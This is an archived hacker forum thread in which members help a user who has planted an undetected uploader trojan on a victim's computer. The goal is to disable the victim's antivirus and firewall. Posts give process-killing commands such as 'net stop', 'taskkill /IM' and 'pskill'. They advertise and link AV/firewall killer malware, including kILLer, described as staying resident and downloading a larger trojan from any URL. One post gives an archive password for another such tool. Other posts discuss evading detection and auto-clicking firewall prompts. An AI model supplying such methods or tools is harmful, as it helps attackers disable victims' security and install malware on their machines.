Full Version: Killing Av
Eyeless
Ok so I got this trojan, made it undetected.. even after execution it isnt detected like others.. but its a uploader trojan. So I cant do anything to the vic; if I upload a trojan it will be detected and so will any of the various AV killers that are public...
Is there anyway to kill a selected process,such as a .bat script or something similir.Something I can just edit with selected process, upload and run.. Please post your ideas: the .bat script could be used but what are the commands??
future
Net Stop <process>
eXist
QUOTE
kILLer vers. 2.0
Coded by illwill in ASM
6/14/2002
===========================================================
kills over 280 AV's and firewalls running
works on win9x/me/nt/2k/xp
;===========================================================
features:
*only 3.07kb packed making it the first and smallest  av/fW killing webdl to date
*downloads a larger trojan from any web url
*stays resident on the computer killing over 280 av's and firewalls
*restarts with the computer

Available from www.illmob.org, I've had a good run with it, so cheers illmob.
You can try packing it/scrambling it but I haven't had it detected.
Other option is to manually stop AV with net stop, so if you know the process names just put them into a .bat, up it and run it.
episode
or you could do taskkill /IM runningfile.exe
D3ADLiN3
I wrote a AVKiller in VB, kills a number or AV's and FW's get in on my site:

www.D3ADLiN3.8k.com
Eyeless
So "netstop <ccapp>" without quotes would be a example in a .bat file... The trojan has a plugin to view processes however it doesnt allow you to kill them so THANKS!
future
no eyeless
it will be not in quotes as you know
"net stop process_here"
remember the spaces between net and stop
Hexadecimal
d3adlin3, my AV detects ur program.
D3ADLiN3
yeah I had included it in a few programs I wrote, if you have MS Visual Basic you can download the source of my site and recompile it.

I may try updating it, possibly adding multiple threads to kill stuff quicker
dragonfly
nice killer D3ADLiN3 gonna try it soon =)
tibbar
why not try and make your trojan undetected? it's a bit gay to go killing AV services, the vic will notice.
Zekk
try changing it up and making it undetectable
Eyeless
Thanks, guys exactly what I needed. I wish I could, well actully I can ive even made Assasin (from evil eye) undetecctable. Well almost, its not hard to make it undetected but after it is ran it drops damn .dll files and its picked up.
MysteryMan
first "net start" : then
net stop <process_to_kill>

or try
first : look open ports and then :
pskill.exe <process_to_kill>

Silent Bob
with norton you cant normaly kill the prog its self, but you can take out
the auto protect... correct me if im worng
prog
QUOTE (eXist @ Feb 20 2004, 09:51 AM)
QUOTE
kILLer vers. 2.0
Coded by illwill in ASM
6/14/2002
===========================================================
kills over 280 AV's and firewalls running
works on win9x/me/nt/2k/xp
;===========================================================
features:
*only 3.07kb packed making it the first and smallest  av/fW killing webdl to date
*downloads a larger trojan from any web url
*stays resident on the computer killing over 280 av's and firewalls
*restarts with the computer

Available from www.illmob.org, I've had a good run with it, so cheers illmob.
You can try packing it/scrambling it but I haven't had it detected.
Other option is to manually stop AV with net stop, so if you know the process names just put them into a .bat, up it and run it.

any links. I went there and dont see it
guufa
You can use abacab,
He can kill more than 400 AV/FW and others Nt services.
And many others functions.

http://0data.site.voila.fr/clientabacab.htm

Password archive: abac
prog
I was looking of for a bat file.

Thanks exist.
torcuato
Yeah Silent Bob, I always found nortons and the best way is to switch off the auto protect in TS or another remote admin smile.gif
I dont know about AV/FW killer programs sad.gif
smith_john
ihae ifected by saser iclean the drive but it still there cool.gif
segv
Those little programs that kill a 1000 different applications are a bad idea. You'll BSOD alot of boxes that way and even if you don't their cpu hogs, querying that long list every 30sec's or whatever value. It's also a great way to be discovered. What do you think happens after a guy can't update his avp and the icon that's been in his systray for a year isn't there anymore ?
prog
this is true, mainly why i was looking for a bat file, one swoop and its done, reboot the box and its back on
toe
well my trojan is undetected so im not worried about killing the av its the firewall. Some ppl may block the connection back or incomming so there lies my problem. i can kill the firewalsl but im finding it really hard to find a list of the main firewall process names. can some ppl name the ones there useing that would help. but it wood be good to create a file that auto click or auto permits the file accessing the internet. Im thinking if the pop up that says permit deny ect. pop ups up in the sme place everytime is it possable to set the mouse to jump to that spot and click. i know that you can set it to jump to somethings when a msg liek that comes up. just something to keep me amussed.

toe
illwill
http://illmob.org/files/illmob/kILLer3.0.zip

yea its a bit outdated but still works
linuxwolf
Wow, and here's me thinking trojans died a long time ago. Good they haven't. Think i'll write one. Anyway, hi to illwill, long time no speak mate.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.